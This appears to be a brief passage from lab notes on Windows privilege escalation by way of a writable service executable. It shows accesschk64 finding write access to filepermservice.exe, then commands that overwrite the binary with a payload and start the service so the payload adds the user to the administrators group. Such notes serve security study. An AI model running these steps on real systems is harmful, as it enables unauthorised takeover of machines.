Executable Files

like the pervious example but we target.exe programs which run in background

Detection

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"

2025-07-06 14_39_08-Kali Linux - VMware Workstation.png

we have a permission to edit on file call filepermservice.exe so we can replace it by our shell to add himself in admin group

---

Exploitation

copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
sc start filepermsvc

2025-07-06 14_43_18-Kali Linux - VMware Workstation.png